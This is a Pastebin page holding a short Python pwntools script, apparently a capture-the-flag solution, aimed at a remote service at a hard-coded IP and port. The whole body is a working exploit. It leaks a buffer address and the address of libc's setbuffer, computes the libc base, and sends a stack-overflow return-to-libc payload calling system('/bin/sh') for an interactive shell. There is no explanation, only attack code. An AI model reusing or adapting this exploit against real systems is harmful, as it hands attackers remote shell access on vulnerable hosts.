Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # -*- coding: utf-8 -*-
- from pwn import *
- host = "35.198.98.140"
- port = 45067
- libc=ELF('./libc.so.6')
- p = remote(host,port)
- offset=libc.symbols['setbuffer']
- system_off=libc.symbols['system']
- sh_offset=0x015cd48
- p.recvuntil(":")
- p.send('a'*15+'b')
- p.recvuntil('ab')
- data=p.recvuntil("Enter length: ")[:-14]
- buff_adr=int(enhex(data[:4][::-1]),16)
- setbuffer_addr=int(enhex(data[-4:][::-1]),16)-11
- print "buffer"
- print hex(buff_adr)
- libc_base=setbuffer_addr-offset
- sh=libc_base+sh_offset
- print "libc_base"
- print hex(libc_base)
- print "system"
- print hex(libc_base+system_off)
- print "/bin/sh"
- print hex(sh)
- p.sendline("-1")
- print p.recvuntil(":")
- payload="a"*80+p32(buff_adr+0x10)+28*"a"+p32(libc_base+system_off)+p32(sh)*10
- p.sendline(payload)
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement